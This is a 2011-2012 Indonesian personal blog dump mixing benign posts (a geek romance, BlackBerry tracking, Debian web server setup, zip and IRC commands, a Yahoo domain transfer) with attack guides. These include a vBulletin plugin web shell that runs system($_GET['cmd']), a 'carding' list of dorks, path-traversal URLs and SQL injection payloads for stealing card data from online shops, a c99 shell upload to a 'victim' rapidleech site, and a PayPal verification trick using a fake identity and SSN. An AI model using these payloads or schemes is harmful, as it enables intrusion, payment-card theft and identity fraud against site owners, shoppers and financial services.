aldyfrz

Computer geek

2012-01-08T10:02:00.002+07:00

Love is a deep, tender, ineffable feeling of affection and solicitude toward a person, such as that arising from kinship, recognition of attractive qualities, or a sense of underlying oneness.

Yap, itulah salah satu definisi "Love" atau "Cinta" yang dikutip dari thefreedictionary.com. Jika diterjemahkan, bahwa cinta itu adalah rasa kasih sayang yang mendalam terhadap seorang dengan adanya rasa perhatian, perasaan dekat, dan rasa bersatu. Well, manusia dikodratkan oleh tuhan agar untuk mencintai seseorang lawan jenisnya (secara default). Mulai dari masa pubertas, manusia sudah memiliki rasa tertarik terhadap orang lain lawan jenisnya dan mereka akan selalu berusaha untuk mendapatkan perhatian dan berusaha untuk mendapatkan cintanya tersebut.

Bagi yang fanatik dengan dunia Teknologi Informasi dan Komunikasi, mungkin mengenal suatu istilah "computer geek" atau biasa diistilahkan dengan "GEEK" saja. Computer Geek adalah orang yang selalu merasa nyaman berada dan duduk di depan komputer sambil melakukan hal-hal baik itu penting maupun tidak penting. Rata-rata komputer geek betah untuk bertahan menemani si komputer hingga berjam-jam lebih, dan mereka sama sekali tidak merasakan perih pada matanya. Mereka selalu memberi perhatian lebih pada komputer mereka, mereka membuat komputernya menjadi lebih baik, walau kadang-kadang dibuat sebagai kelinci percobaan. So, jika kita sandingkan dengan definisi tentang Cinta diatas, maka bisa dikatakan bahwa "Komputer" merupakan objek Cinta dari Computer Geek atau dengan kata lain, komputer geek mencintai Komputernya secara mendalam.

Namun perlu diingat, computer geek adalah manusia, bukan komputer juga. Mereka secara umum diposisikan sebagai brainware, agar komputer bisa berjalan sesuai dengan kendali mereka. Pada bagian awal sudah dijelaskan bahwa manusia itu ditakdirkan dan dikodratkan untuk mencintai lawan jenisnya yang masih bertipe sama, manusia (lagi-lagi secara default). Jadi untuk kasus computer geek itu sendiri, ada sedikit kejanggalan dalam hal cinta. Janggalnya adalah karena si computer geek mencintai komputernya namun mereka harus juga mencintai seseorang. Anda dan saya tahu sendiri bahwa secara default manusia adalah singlecore, hanya bisa mencintai sesuatu saja secara mendalam dalam satu waktu. Kecuali bagi mereka yang suka menduakan cinta, berarti mereka adalah manusia yang tidak bisa mengartikan rasa cinta yang sebenarnya yang diberikann oleh tuhan.

Nah trus bagaimana dengan nasib si default computer geek? Dengan ini saya akan memberikan sedikit uraian mengenai kisah dan jalannya cinta seorang geek. Pada dasarnya mereka tetap bisa mencintai manusia lawan jenis sedalam hati. Saya akan sebut si computer geek dengan GEEKY, dan si cewek yang disukai oleh GEEKY bernaa CATTY (bukan CATTY SHARON).

GEEKY adalah seorang administrator server Jardiknas sekaligus pegawai Tata Usaha di suatu sekolah. Dia baru saja lulus kuliah S1 Teknik Informatika dari suatu Universitas terkenal. Dia masih bekerja secara lepas dan nghonor, dan juga memiliki banyak waktu luang untuk melakukan apa saja yang diinginkannya. Namun waktu luang itu hanya digunakan untuk sesuatu yang menjadi kecintaannya, yaitu bekerja dihadapan komputer untuk sekedar ngoprek, ngetik postingan blog, baca-baca e-book, dsb. Selain itu, GEEKY juga sering nongkrong, tempat tongkrongannya hanya satu, hotspotan di depan WARNET!

Di WARNET tersebut, banyak sekali gadis-gadis cantik yang lewat keluar masuk di WARNET tersebut. Walau begitu, si GEEKY hanya memandang setiap cewek 500 milisekon saja, kemudian kembali melihat laptopnya yang sedang dipakai untuk Internetan. Dan si GEEKY tidak merasa terganggu dan terpesona dengan wanita yang datang tersebut.

Walau begitu, GEEKY adalah seorang Laki-Laki yang normal. Pada saat dia bosan nge-geek (kata kerja untuk seorang geek), karena semua e-book sudah dibacanya dan semua hal sudah pernah dioprek, maka akhirnya si GEEKY beristirahat menyederkan kepalanya di WARNET. Kebetulan teman lamanya banyak yang datang di warnet itu, jadinya saling ngobrol tidak bisa dihindarkan lagi, mereka saling berbagi cerita.

Nah seorang cewek berkacamata dan postur agak gemuk datang, dialah bernama CATTY. Tiba-tiba, GEEKY merasakan rasa tertarik dan jatuh cinta yang mendalam terhadap cewek tersebut. CATTY adalah adik kelasnya pada masa SMA, CATTY kenal dekat dengan si GEEKY, jadi si GEEKY langsung saja bersapa dengan CATTY. Karena tidak tahu nomor HP-nya, GEEKY langsung menanyakan nomor HP-nya si CATTY, dan CATTY langsung memberikannya tanpa basa-basi lagi, karena mereka sudah saling kenal.

OK, tidak perlu pandang apa-apa lagi langsung saja si GEEKY PeDehKahTeh lewat SMS. Dengan gaya sok perhatian, bertanya dimana posisi, sedang apa, makan apa, sudah makan belum dan bahasa-bahasa PeDehKahTeh lainnya. Nah, tiba saatnya si GEEKY ingin nge-date dengan si CATTY, mereka akhirnya janjian nge-date di suatu restoran kecil. Tibalah saatnya si GEEKY untuk mengungkapkan rasa cintanya kepada si CATTY, dan hasilnya? Karena si CATTY juga suka diperhatikan oleh si GEEKY, maka akhirnya si CATTY menerima cintanya si GEEKY. Siul siul, pasangan baru akhirnya muncul.

Tahukah anda bagiamana si GEEKY menurut si CATTY, ternyata si CATTY merasa si GEEKY itu sangat romantis, dengan gaya bahasa cinta yang gokil dan berbeda daripada orang pada umumnya. Karena GEEKY adalah seorang computer geek, maka si GEEKY mengungkapkan kata-kata romantisnya dengan bahasa GEEK. Namun dengan rasa cintanya kepada CATTY, si GEEKY mulai berkurang kadar nge-GEEK-nya. Waktu luangnya digunakan untuk jalan-jalan dan mesra-mesraan dengan CATTY, jadilah cintanya kepada si komputer dihianati.

Kesimpulannya adalah bahwa computer geek seharusnya bisa mengurangi kadar geeknya agar bisa mencintai orang lain =D Sekian junk dari saya, dan terima kasih atas membacanya.

ASLI BUKAN DARI PENGALAMAN SAYA
haha

Melacak Blackberry yang hilang

2012-01-03T11:39:00.003+07:00

Cara Melacak Blackberry yang Hilang - Kalau denger handphone hilang pasti bawaannya lemes, apalagi itu handphone kita sendiri, Blackberry pula. Handphone jadul aja hilang pasti bawaannya lemes, apalagi handphone secanggih Blackberry. Belum lagi kalau handphone tersebut udah ada yang nemu, pasti simcardnya dilepas tuh. Sayang banget kita yang beli susah-susah, tapi orang lain tinggal ngambil aja dapet. Tapi tenang dulu sob, untuk menghindari hal-hal tersebut, ada salah satu aplikasi yang memungkinkan untuk melacak Blackberry yang hilang. Nama aplikasi-nya Blackberry Protect.

Cara Melacak Blackberry yang Hilang - BlackBerry Protect adalah program gratis dari RIM yang menawarkan layanan backup, lock device, melacak keberadaan handphone, Wipe handphone dan pengiriman notifikasi.

Silakan download dulu aplikasi Blackberry Protect di https://appworld.blackberry.com/webstore/content/20844. Setelah itu install Blackberry Protect hingga selesai.

Untuk melacak Blackberry mu misalkan hilang dan sudah pernah menginstall aplikasi tersebut, kalian bisa mengakses-nya dengan mengunjungi http://www.blackberry.com/protect/login.

Dalam aplikasi itu, masuk saja ke pilihan Find Device, lalu View Current Location. Kamu bisa melacak keberadaan HP Blackberrymu melalui peta. Selain itu, dalam aplikasi ini juga ada pilihan untuk Display a Message, yaitu berguna untuk menampilkan pesan di layar handphone.

Upload Shell di vbulletin

2011-12-20T09:45:00.000+07:00

di sini adalah tip yang baik untuk meng-upload shell pada sebuah vBulletin
Dalam AdminCP ada manajer plugin namanya. Dimana Anda dapat menambahkan plugin.
Tambahkan plugin. Buatlah untuk Ajax_complete dan di kode area menambahkan:
if(isset($_GET['cmd'])){echo “<h1>cmd</h1><pre>”; system($_GET['cmd']);exit;}
Aktifkan mod.
sekarang kunjungi berikut
www.site.com/forumlocation/ajax.php?cmd=command
sekarang kunjungi
www.site.com/forumlocation/ajax.php?cmd=ls

Membuat Web Server dengan Debian 5

2011-11-27T05:39:00.001+07:00

Langsung aja :D

$ apt-get install apache2 mysql-server phpmyadmin php5

tekan Y jika ditanya verifikasi.

1. Nanti akan muncul gambar seperti ini, maka masukkan password untuk mysql nya. its up to you. :)

2. Terus yang ini tekan spasi untuk memberikan tanda bintang pada apache2 nya. Kemudian tekan enter.

3. Kemudian nanti akan muncul tampilan kayak gini, pilih saja yes lalu tekan enter.

4. Masukkan password untuk phpmyadminnya. Terserah anda..

5. Samakan saja dengan password phpmyadmin diatas jika muncul tampilan seperti ini.

6. Lalu ketikkan lagi passwordnya untuk konfirmasi.

Selesai deh. hehe gampang kan?

Sekarang kita tes satu persatu. buka web browser di komputer client lalu ketikkan ip servernya. misalnya ip servernya 192.168.7.1, jadi kita buka http://192.168.7.1. jika muncul tampilan seperti ini maka berarti webserver apache2 nya telah berfungsi dengan baik

Lalu ketikkan lagi di webbrowser http://192.168.7.1/phpmyadmin, jika muncul seperti ini berarti phpmyadminnya juga berfungsi. Masukkan usernamenya root dan passwordnya yang telah anda isikan pada saat instalasi tadi.

Sebenernya fungsi dari phpmyadmin adalah untuk mengedit database mysql melalui tampilan web. jadi sebenarnya kalo udah berhasil login ke phpmyadminnya, berarti sudah dipastikan kalo mysqlnya telah berfungsi dengan baik juga. tapi supaya lebih afdol, kita coba tes juga di debian servernya. caranya ketik :

mysql -u root -p

terus masukkin password mysql nya.

zip at linux / zip di shell

2011-11-22T09:23:00.000+07:00

Q. Windows has winzip program what about Linux; I cannot find anything under Application menu. I am using Debian Linux distribution. How do I zip and unzip file under Linux?
A. Linux has both zip and unzip program. By default, these utilities not installed (see Linux winzip like GUI tools/utilities below). To install them from shell prompt (open shell prompt by clicking on Application > System Tools > Terminal ). You must be a root user, Type following two commands to install zip and unzip program:

# apt-get install zip
# apt-get install unzip

If you are Red Hat Linux/Fedora user then you can use yum command to install zip and unzip program:

# yum install zip
# yum install unzip

zip is a compression and file packaging utility for Linux and Unix (including FreeBSD, Solaris etc).
unzip will list, test, or extract files from a ZIP archive files.

zip examples:
Creates the archive data.zip and puts all the files in the current directory in it in compressed form

$ zip data *

No need to add .zip extension or suffix as it is added automatically by zip command.
To zip up an entire directory (including all subdirectories), the command:

$  zip -r data *

unzip example:
To use unzip to extract all files of the archive pics.zip into the current directory & subdirectories:

$ unzip  pics.zip

You can also test pics.zip, printing only a summary message indicating whether the archive is OK or not:

$ unzip -tq pics.zip

To extract the file called cv.doc from pics.zip:

$ unzip pics.zip  cv.doc

To extract all files into the /tmp directory:

$ unzip pics.zip  -d /tmp

To list all files from pics.zip:

$ unzip -l pics.zip

Update blog lagi ah.

2011-11-22T09:21:00.000+07:00

udah lama banget ga update blog
karena kesibukan di dunia nyata.

update lagi ah :D
back to blogger lagi

he

domain co.cc di banned google ?

2011-07-03T09:02:00.001+07:00

Sebuah fenomena langka terjadi pada awal bulan Juli 2011 ini. Setiap blog dengan domain co.cc menghilang dari google. Apakah ini bertanda bahwa domain co.cc telah dibanned oleh google?

Memang dalam beberapa hari terakhir mengemuka informasi diberbagai blog lokal dan internasional, bahwa pada akhir bulan Juni 2011 akan terjadi update pagerank terbaru dari google. Namun meski demikian sebelumnya tidak ada beredar informasi yang menyatakan bahwa akan terjadi banned massal terhadap situs berdomain co.cc yang dilakukan oleh mesin pencari terkemuka google.com. Bukti bahwa domain co.cc telah dibanned google dapat dibuktikan dengan melihat beberapa blog populer di Indonesia yang berdomain co.cc, kini sudah tidak bisa lagi ditemukan ketika mencarinya melalui search engine google.

Selain itu ketika kita mencoba mengetikkan kata "site:co.cc" di search google tanpa tanda kutip, maka tidak ada satupun hasil pencarian yang ditemukan, padahal seperti diketahui selama ini ada jutaan bahkan ratusan juta halaman situs dan blog berdomain co.cc yang diindex oleh google dan akan langsung dengan mudah ditemukan dengan mengetikkan "site:co.cc".

Dibannednya satu alamat domain seperti halnya co.cc dari google, tentu akan menyebabkan kerugian yang amat besar pagi para domain tersebut. Sebab seperti kita ketahui kebanyakan pengunjung situs dan blog yang tidak menjadi brand image, maka sudah dapat dipastikan kebanyakan pengunjung tersebut adalah berasal dari mesin pencari.

Sejauh ini memang belum dapat dipastikan apakah memang benar domain cc.cc sudah dibanned google. Namun sebagai blogger kita semua tentunya berharap agar kejadian hilangnya domain co.cc dari google ini, kiranya akan segera berakhir dan tidak merugikan teman-teman blogger yang selama ini berkutat dengan domain co.cc-nya.

sumber : www.beritanet.com/Technology/Domain_Co.cc_Hilang_Dari_Google.html

Verified paypal free / cara verifikasi paypal gratis

2011-06-29T12:45:00.001+07:00

1. Go to ETRADE: etrade

2. Click on "OPEN AN ACCOUNT".

3. Click "APPLY NOW" on "ETRADE Complete Investment Account".

4. Now you will need to fill in info. DO NOT put your real info. Use Name fake name generator : Generate a Random Name - Fake Name Generator (IMPORTANT: Get an identity from the US)! Use an email that you can access. For the "Account Type", pick "Individual account".

5. For "Step 1: Choose Account Type", pick "Cash Account Only".

6. Put in the fake address and phone number that you got from Fake Name Generator, and make sure that both of the boxes unchecked!

7. Now you will need a Social Security number. As usual, DO NOT put in your real info. Put the SSN from Fake name generator Make sure it is in. Also make sure you put your "Country of Legal Residence" as "United States" and click "US citizen".

8. For your "Employment Status" just make up jobs. Make sure it is in the same city, state, zip, and country. DO NOT make the address of your Employer the same as where your "home" address is. Pick "No" for all the options

9. For "Additional Account Preferences", put in what I say. Put in "Income" for "Investment Objectives". Put in "Excellent" for "Investment Experience". Pick the first option for all the drop-down boxes and pick "NO" for the selection.

10. Now for "Sweep Accounts", pick the first one and pick "NO" for the rest.

11. Make sure that all the boxes are unchecked on "Select Documents for Electonic Delivery".

12. Click I Accept and DO NOT check the box.

13. Now pick "NO. I want to create a new user ID and password for this account".

14. Make an account that you can remeber.

15. Now login to your account. Your account number should be in the middle of the page.

16. Now goto the "Add a Bank account" page in PayPal.

17. For routing number, put in : 056073573.

18. For account number, put in: your account number, you should see it when you log in.

19. Now go to the next page and enter your login info.

20. Pick the Instant option on the page and wait a few mins.

21. CONRATULATIONS! YOU PAYPAL IS VERIFIED!!!

ENJOY

aldyfrz :p

credit : dazedbots.com/showthread.php?tid=373

Command dasar Irc

2011-06-26T13:01:00.001+07:00

Command User
_______________________________

Melihat informasi channel :
/chanserv info <#channel>

Melihat Informasi nick :
/nickserv info

Mengganti nick :
/nick

Daftar (registrasi) nick
Ubah dulu nick-mu ke nick yg ingin di daftar, lalu : /nickserv register

Identify nick yg telah terdaftar agar tidak menjadi nick Guest* :
/identify

Jika nick-mu yg terdaftar dipakai org lain, buat dia Quit dengan :
/nickserv ghost

Melindungi nick yg terdaftar agar tidak bisa dipakai org lain :
/nickserv SET enforce ON

Jika kamu tak ingin nick-mu di add Op oleh temanï¿½mu :
/nickserv SET noop ON

Jika tidak ingin melihat tulisan yg ditulis oleh :
/ignore

Untuk membuka semua ignore list :
/ignore -r

Mengirim Memo antar user :
/memoserv send

Membaca Memo :
/memoserv read

Menghapus Memo :
/memoserv del
/memoserv del all

Menghapus tulisan di window chat :
/clear

Action ke seluruh Window #channel :
/ame

MSG ke seluruh #channel :
/amsg

Quit dengan pesan :
/quit

Part dengan pesan :
/part <#channel>
_________________________________________

Command Oper@tor

Kick user :
/kick <#channel>

Unban :
Untuk diri sendiri : /chanserv unban <#channel>
Untuk user lain : /mode <#channel> -b

Meng- Op & Deop :
/chanserv op <#channel>
/mode <#channel> +o
/chanserv deop <#channel>
/mode <#channel> -o

Voice & Devoice :
/mode <#channel> +v
/mode <#channel> -v

Ganti Topic Channel :
/topic <#channel>

Moderat Channel agar yang bukan +o atau +v tidak bisa terbaca tulisannya :
/mode <#channel> +m

Membatasi jumlah user yang masuk #channel :
/mode <#channel> +l

Hanya nick yang terdaftar yang boleh masuk channel :
/mode <#channel> +R

Hanya operator channel yang boleh masuk channel :
/mode <#channel> +i

14 Teknik Carding

2011-06-24T09:54:00.000+07:00

Kali ini saya memberikan 14 teknik carding….
ini sih cara jadul tapi dah jarang bug kaya gini. tapi masih ada ko :p wkwkkw masih ampun dikit :p
simak aja ni :

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log
13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”

Upload a shell in rapidleech

2011-06-21T21:53:00.002+07:00

1 Step:-
In rapidleech php, asp scripts are not allowed to upload so change the extension of your shell like:- c99.php change it to c99.php.txt or c99.php.rar or what ever you want.

2 Step:-
Upload it to rapidshare, hotfile, fileserve or any other host whose link you can transload(upload) to rapidleech.

3 Step:-
Tranload(upload) your shell in Rapidleech and after transloading go to the server file
there you will get your shell then just rename it to c99.php.

4 Step:-
Congrats shell is upload then just go http://victimrapidleech.com/files/c99.php

Enjoy guys

How To transfer domain from yahoo

2011-06-20T16:38:00.000+07:00

To transfer a domain from Yahoo! to us, you will need the following information:

✔ Domain status – Locked or Active

✔ Administrative contact for registered domain

✔ Authorization or EPP code (.com, .net, .org, .biz, .us, and .info TLDs only).

If you do not have that information on hand, you can obtain it froma Yahoo!. The domain transfer cannot succeed unless the domain name is unlocked, the administrative e-mail address is valid, and the correct authorization code is provided (for .com, .net, .org, .biz, .us. or .info domains).

See below for a description of the specific elements and issues involved in transferring a domain from Yahoo! to this registrar.

Unlocking Domain

Domain names registered with Yahoo! might have been placed in the user-controlled “Lock” status, which is displayed as “Registrar-Lock” at the registry. Before a domain transfer is requested, the lock must be removed and the registry status verified as Active.”

To Unlock Your Domain

1. Log in to your Business Control Panel at ttp://smallbusiness.yahoo.com/index.php.

2. Click the Domain Control Panel hyperlink for the domain you want to unlock.

3. Click Edit Domain Locking.

4. Click Unlock Domain.

Note: It may take up to 24 hours before our system identifies and recognizes the status change.

The Importance of the Administrative Domain Contact

The administrative contact is one of the four contacts listed in the Whois database for a registered domain. The contact information is defined by the registrant. As part of the domain transfer process, we will send a transfer-approval e-mail message to the domain's administrative contact listed in the Whois database. The e-mail message contains the Transaction ID and Security Code that enable the administrative contact to approve the transfer.

Changing Administrative Contact Information

If you have just removed the lock from a domain registered with Yahoo! (the “unlock” procedure is described above), 24 hours should elapse before the administrative contact responds to the transfer approval e-mail message, as it can take up to 24 hours before our system recognizes changes to the domain's Whois information. Any attempt to respond to the transfer approval message before the status change has been completed will result in transfer failure. You will receive an instant e-mail notification of the failed transfer.

To Change the Administrative Contact for Your Domain

1. Log in to your Business Control Panel at http://smallbusiness.yahoo.com/index.php.

2. Click the Domain Control Panel hyperlink for the domain you want to access.

3. Click the View/Edit Your Domain Registration hyperlink.

4. On the Domain Registration Information page, click Edit.

5. Edit your Administrative contact.

Note: It may take up to 24 hours before our system recognizes the changes.

Authorization Code

To transfer a .com, .net, .biz, .info, .org, or .us domain name you will need an authorization code. An authorization code is a unique code assigned by registrars .com, .net, .biz, .us, .info, and .org domain names at the time of registration.

Note: Website Services customers must contact Yahoo! At ttp://smallbusiness.yahoo.com/contactus/ to obtain their authorization code.

To Obtain Your Authorization Code from Yahoo!

1. Log in to your Business Control Panel at http://smallbusiness.yahoo.com/index.php.

2. Click the Domain Control Panel hyperlink for the domain you want to access.

3. Click View Your Authorization Code.

Transferring Domain

Assuming that the above issues are in order, the domain transfer process proceeds thus:

To transfer a domain to this registrar:

1. Advise the domain's administrative contact that the domain name is being transferred.

2. We will e-mail the administrative contact by the next business day with instructions on how to approve the transfer.

3. Once the administrative contact has approved the domain transfer, we will send a transfer request to the registry. If the domain's administrative contact does not have access to the account from which the transfer request was purchased, the recipient of the e-mail request must forward the Transaction ID and Security Code to someone who does. These codes must be entered on the Pending Domain Transfer screen in your account in order to approve the transfer. Once the Transaction ID and Security Code are successfully entered, we will request the transfer at the registry. The registrar of record then has five (5) calendar days to deny the transfer. If the registrar of record does not deny the transfer, the transfer is automatically approved.

4. The registry will contact Yahoo! via e-mail.

5. Yahoo! will send an acceptance or rejection notice to the registry. If the registrar fails to deny the transfer within five days, the registry will move the domain registration to this registrar.

6. The registry will notify us of the acceptance or rejection.

7. We will inform you via e-mail that the transfer is complete. Should the domain transfer fail, we will notify you via e-mail. You may resubmit your transfer request if the transfer fails. However, to ensure that the information listed in your transfer request remains valid, you will have 30 days from the time of your purchase to complete the transfer.

Hack facebook. Mudahnya Menjebol Facebook

2011-05-28T06:48:00.009+07:00

jiah. waktu saya ada chips poker nih. banyak juga yg ngincer fb saya. bruakakakak. =)). saya akui. fb saya vuln d tanem email.
kalo masalah tanem email pasti dah pada tau deh ? woke .
gampang lah kalo tanem email.

fb saya itu fb primary saya. suram banget deh. :(( fb cacad . fvck fb. gampang banget d jebol nya :((. maintenance ke maintenance malah nambah cacad tuh security.
kali kali ini sering banget yg ngincar fb saya. tapi gw kaga khawatir gw udah punya cara ampuh. walaupun dah d tanem email. hahahaha :D

gini ya. kita ngobrol tentang security question.
mohon hatihati deh sewaktu mengisi form permintaan security dari facebook, khususnya tentang security question. kalau memang belum pernah diisi, sebaiknya tidak perlu diisi. Tapi kalau sudah terlanjur diisi, mudah2xan jawaban security question nya adalah jawaban yang susah ditebak atau jawaban ngawur. Karena sekali anda mengisi security question, anda tidak akan bisa menggantinya lagi.
Jika seseorang berhasil menebak security question anda, akun anda sangat mudah dibobol, tidak perduli sepanjang apapun password anda dan seaman apapun proteksi email anda.
bruakakak. parahhhhhhhhhhhhh nih fb. tumbal juga fb saya. yaudah gapapa. saya curhat aja disini.

yaudah deh itu mah gampang kalo tanem email.. haha :p

Sekarang pertanyaannya, kok saya bisa tahu?
jawabannya adalah karena saya mencoba meng-hack diri saya sendiri, setelah sebelumnya (kemungkinan seterusnya sebelum dipatch oleh facebook) security question saya bisa ditebak dengan mudah oleh hacker. untung saya bukan hacker. cuma hack fb sendiri. wkwkwkkw hacker sendiri

Hanya yang jadi masalah, karena jawaban security question sudah diketahui oleh hacker dan jawaban tidak bisa diganti atau diedit, maka hacker dengan mudah bisa terus menerus mencoba membobol akun kita, sambil berharap mudah2xan pemilik akun yang asli tidak merecover akunnya atau tidak tau cara merecover akun sehingga waktu 24 jam terlewati, dan akun facebook sepenuhnya dikuasai oleh hacker.
(Itu yang sekarang terjadi dengan akun saya, tiap hari saya harus rajin merecover akun yang dihack)
solusi saya sih gampang sebenernya. wkwkwkw ada deh :P

terinspirasi. bertapa dulu d google. ,. hehe
Caranya adalah dengan menghack akun anda sendiri lalu merecovernya sendiri sebanyak 2 kali berturut turut dengan waktu total kurang dari 1 jam (mirip waktu multi bld ya... )
angka 1 jam hanya perkiraan saya saja, karena sebelumnya saya mencoba menghack dengan total waktu 3 jam, security question masih terbuka
langsung aja kita ilustrasikan contohnya :
jam 15.00 --> anda menghack akun anda sendiri
jam 15.10 --> anda merecover akun anda
jam 15.20 --> sekali lagi anda menghack akun anda sendiri
jam 15.30 --> anda recover lagi akun anda.
selesai

selanjutnya jam berapapun anda atau orang lain berusaha untuk menghack akun anda sendiri, tidak ada lagi permintaan security question.
singkatnya, proses hack berhenti di urutan ke 3.
